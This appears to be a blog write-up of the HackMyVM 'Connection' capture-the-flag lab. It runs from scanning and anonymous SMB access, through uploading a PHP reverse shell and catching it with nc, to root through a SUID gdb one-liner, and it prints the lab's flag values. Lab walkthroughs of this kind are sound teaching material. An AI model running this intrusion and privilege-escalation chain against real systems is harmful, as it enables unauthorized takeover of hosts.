HackMyVM - Connection

Posted on 2025-08-22 Edited on 2026-03-01 In ctf Views: Disqus: Word count in article: 592 Reading time ≈ 2 mins.

SMB file upload and SUID gdb privilege escalation.

Connection

scan

❯ rustscan -a  192.168.0.104
PORT    STATE SERVICE      REASON
22/tcp  open  ssh          syn-ack
53/tcp  open  domain       syn-ack
80/tcp  open  http         syn-ack
139/tcp open  netbios-ssn  syn-ack
445/tcp open  microsoft-ds syn-ack

web

❯ gobuster dir -u http://192.168.0.104 -w ~/ctf/tool/dic/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
/server-status        (Status: 403) [Size: 278]
Progress: 220558 / 220558 (100.00%)
===============================================================
Finished
===============================================================

smb

file upload

reverseShell

❯ smbclient --list=192.168.0.104 --no-pass
Can't load /etc/samba/smb.conf - run testparm to debug it
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        share           Disk
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Private Share for uploading files)
SMB1 disabled -- no workgroup available

❯ enum4linux -a -o 192.168.0.104
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Aug  8 17:47:46 2025

Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

❯ smbclient //192.168.0.104/share -N
smb: \> cd html
smb: \html\> ls
  index.html                          N    10701  Wed Sep 23 09:48:45 2020

smb: \html\> put reverseShell.php
putting file reverseShell.php as \html
everseShell.php (3818.0 kb/s) (average 3818.4 kb/s)
smb: \html\> ls
  .                                   D        0  Fri Aug  8 18:12:41 2025
  ..                                  D        0  Wed Sep 23 09:48:39 2020
  index.html                          N    10701  Wed Sep 23 09:48:45 2020
  reverseShell.php                    A     3910  Fri Aug  8 18:12:41 2025

suid gdb

❯ rlwrap nc -lvnp 8848
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c "import pty; pty.spawn('/bin/bash');"

www-data@connection:/home/connection$ cat local.txt
cat local.txt
3f491443a2a6aa82bc86a3cda8c39617

www-data@connection:/$ find / -perm -u=s -type f 2>/dev/null | xargs ls -la
find / -perm -u=s -type f 2>/dev/null | xargs ls -la
-rwsr-xr-x 1 root root         54096 Jul 27  2018 /usr/bin/chfn
-rwsr-xr-x 1 root root         44528 Jul 27  2018 /usr/bin/chsh
-rwsr-sr-x 1 root root       8008480 Oct 14  2019 /usr/bin/gdb
-rwsr-xr-x 1 root root         84016 Jul 27  2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root         51280 Jan 10  2019 /usr/bin/mount
-rwsr-xr-x 1 root root         44440 Jul 27  2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root         63736 Jul 27  2018 /usr/bin/passwd
-rwsr-xr-x 1 root root         63568 Jan 10  2019 /usr/bin/su
-rwsr-xr-x 1 root root         34888 Jan 10  2019 /usr/bin/umount
-rwsr-xr-- 1 root messagebus   51184 Jul  5  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root         10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root        436552 Jan 31  2020 /usr/lib/openssh/ssh-keysign

www-data@connection:/$ /usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
# cd root
cd root
# ls -al
ls -al
total 24
drwx------  3 root root 4096 Sep 22  2020 .
drwxr-xr-x 18 root root 4096 Sep 22  2020 ..
lrwxrwxrwx  1 root root    9 Sep 22  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4096 Sep 22  2020 .local
lrwxrwxrwx  1 root root    9 Sep 22  2020 .mysql_history -> /dev/null
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rwx------  1 root root   33 Sep 22  2020 proof.txt
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
# cat proof.txt
cat proof.txt
a7c6ea4931ab86fb54c5400204474a39